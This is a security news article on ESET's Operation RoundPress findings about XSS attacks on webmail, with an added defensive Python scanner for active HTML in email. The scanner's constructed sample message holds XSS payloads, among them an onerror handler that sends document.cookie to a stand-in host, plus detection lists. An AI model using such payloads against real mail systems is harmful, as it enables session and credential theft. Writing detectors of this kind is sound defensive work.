Webmail services, hailed for their flexibility and cost-effectiveness, have become a staple for businesses of all sizes, especially small and medium enterprises opting for easy, browser-based access to corporate email.
However, ESET research warns that these advantages come with substantial risk: threat actors are increasingly exploiting cross-site scripting (XSS) vulnerabilities in webmail platforms, with the malicious script delivered inside the email itself.
ESET's recent disclosure of Operation RoundPress, attributed to the notorious Sednit group, documents a sustained espionage campaign, exposes vulnerabilities in widely used webmail software, and confirms that webmail remains a lucrative target for threat actors.
Despite the evolution of collaborative platforms, email remains the backbone of business communications.
The global user base for email surpassed 4.37 billion in 2023, with 347 billion emails sent daily, a figure projected to rise to 408 billion by 2027.
Telemetry from Litmus shows that, following Apple Mail, webmail environments constituted the second most popular method for email engagement, accounting for 36% of use in 2022.
Yet, the popularity of webmail has given cybercriminals a wide attack surface, amplified by a perceived sense of security and ease of maintenance that is not always matched by rigorous cybersecurity practices.
Sednit’s Sophisticated XSS Campaigns
The Sednit group, aligned with Russian interests, has been orchestrating targeted attacks against high-value webmail servers using XSS-based exploits.
Beginning with the exploitation of Roundcube and expanding, under the name Operation RoundPress, to other products, Sednit has leveraged both known and zero-day vulnerabilities in popular webmail applications, including Horde, MDaemon, and Zimbra.
The primary attack vector has been spearphishing emails whose HTML body embeds JavaScript; an XSS flaw in the webmail application's message rendering lets that script run in the victim's browser, inside the authenticated webmail session, as soon as the message is viewed.
Unlike traditional malware, nothing is installed on the endpoint and no user action beyond opening the email is required: the payload executes in the browser and leaves little on disk, making detection challenging.
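As an added illustration (not ESET's tooling and not code from any webmail project), the following Python script shows the kind of pre-render check a mail gateway or a webmail deployment can run on incoming messages: it walks the MIME parts of a message, parses every text/html body, and flags the constructs that turn a message body into an XSS payload (script-bearing tags, on* event handlers, javascript: and non-image data: URLs, and active CSS). The two messages below are constructed samples, and the tag and attribute lists are the author's assumptions, not a published rule set.

```python
"""Flag active HTML content in an email before a webmail client renders it.

Added example, not vendor code. The sample messages and the detection
lists are constructed for illustration.
"""
import re
from email import policy
from email.parser import BytesParser
from html.parser import HTMLParser

# Elements that have no business in a mail body a browser will render
# (assumed list; real deployments tune this to their sanitizer policy).
ACTIVE_TAGS = {"script", "iframe", "object", "embed", "svg", "math",
               "base", "meta", "link", "form"}
# Attributes that carry a URL the browser may navigate to or load.
URL_ATTRS = {"href", "src", "action", "formaction", "xlink:href",
             "data", "background"}
_ACTIVE_CSS = re.compile(r"expression\s*\(|javascript:|behavior\s*:", re.I)


def suspicious_uri(value: str) -> bool:
    """True for javascript:/vbscript: schemes and for data: URLs other than
    inline images. Whitespace and NULs are stripped first because browsers
    ignore them inside the scheme (e.g. 'java\\tscript:')."""
    v = re.sub(r"[\s\x00]", "", value).lower()
    if v.startswith(("javascript:", "vbscript:")):
        return True
    return v.startswith("data:") and not v.startswith("data:image/")


class ActiveContentFinder(HTMLParser):
    """Collects findings as 'kind:tag[@attr]' strings while parsing."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.findings: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag in ACTIVE_TAGS:
            self.findings.append(f"tag:{tag}")
        # HTMLParser lowercases names and entity-decodes attribute values,
        # so '&#106;avascript:' arrives here as 'javascript:'.
        for name, value in attrs:
            value = value or ""
            if name.startswith("on"):           # onerror, onload, onclick ...
                self.findings.append(f"handler:{tag}@{name}")
            elif name in URL_ATTRS and suspicious_uri(value):
                self.findings.append(f"uri:{tag}@{name}")
            elif name == "srcdoc":              # inline document in an iframe
                self.findings.append(f"srcdoc:{tag}")
            elif name == "style" and _ACTIVE_CSS.search(value):
                self.findings.append(f"style:{tag}")


def scan_message(raw: bytes) -> list[str]:
    """Parse an RFC 822 message and return findings from all HTML parts."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    findings: list[str] = []
    for part in msg.walk():                     # single-part messages yield themselves
        if part.get_content_type() != "text/html":
            continue
        finder = ActiveContentFinder()
        finder.feed(part.get_content())         # decoded str for text/* parts
        finder.close()
        findings.extend(finder.findings)
    return findings


# Constructed sample: an ordinary HTML mail with a link and an inline logo.
BENIGN = b"""From: alice@example.org
To: bob@example.org
Subject: Minutes
Content-Type: text/html; charset=utf-8

<html><body><p>Minutes attached. <a href="https://example.org/doc">Link</a></p>
<img src="cid:logo"></body></html>
"""

# Constructed sample: a lure whose HTML alternative carries three XSS tricks
# (an event handler, an entity-obfuscated javascript: link, script in SVG).
MALICIOUS = b"""From: news@example.net
To: bob@example.org
Subject: Breaking: update on the situation
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain; charset=utf-8

Read the full story.
--b1
Content-Type: text/html; charset=utf-8

<html><body><p>Read the full story.</p>
<img src="x" onerror="fetch('https://example.invalid/c?'+document.cookie)">
<a href="&#106;avascript:void(0)">Open</a>
<svg><script>alert(1)</script></svg>
</body></html>
--b1--
"""

if __name__ == "__main__":
    for label, raw in (("benign", BENIGN), ("malicious", MALICIOUS)):
        print(label, scan_message(raw))
```

The benign message produces no findings; the lure yields one finding per trick (the onerror handler, the javascript: href, the svg element and the script element). A check like this belongs in front of the renderer rather than instead of a sanitizer: it is a triage signal for quarantine and alerting, while the webmail application itself must still apply an allowlist-based HTML sanitizer, which is exactly the component the exploited XSS flaws bypassed.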
Most victims have been government entities and defense contractors, particularly in Eastern Europe, but recent campaigns have also targeted governmental organizations in Africa, Europe, and South America.
The attacks often employ spearphishing, delivering emails that mimic newsworthy events, especially those related to Ukraine, to lure recipients into opening the malicious messages.
Once triggered, the script runs with the victim's webmail session, allowing attackers to harvest credentials; exfiltrate contacts, email contents and settings; steal two-factor authentication secrets; and even create app passwords that bypass otherwise robust security protections.
Urgency for Patch Management
Industry data underscores the threat: according to a 2024 Forrester report, 22% of breaches originating from external attacks exploited web application vulnerabilities, including XSS.
Alarmingly, attackers do not rely only on new vulnerabilities: because of slow patching cycles, they are still able to compromise businesses with exploits for flaws that have been public for months or even years.
The MDaemon zero-day, which the vendor patched within two weeks of ESET's disclosure, illustrates that, while the risk is real and evolving, timely action can effectively neutralize emergent threats.
ESET's report emphasizes that businesses must not view webmail as a set-and-forget solution.
Applying patches immediately upon release, raising employee awareness about phishing and spearphishing tactics, and deploying comprehensive endpoint and network security tools remain essential defenses.
The RoundPress campaign demonstrates that, while attackers are persistent and sophisticated, basic cybersecurity hygiene including regular updates and staff training can significantly reduce the risk of compromise.
Notably, ESET claims its clients benefited from layered protection, with firewalls blocking data exfiltration and endpoint software halting the execution of malicious scripts, mitigating the operational impact of this campaign.
The rise in XSS attacks targeting webmail platforms signals a pressing need for vigilance: as the reliance on email for business communications grows, so too does the requirement for rigorous, continuous cybersecurity oversight.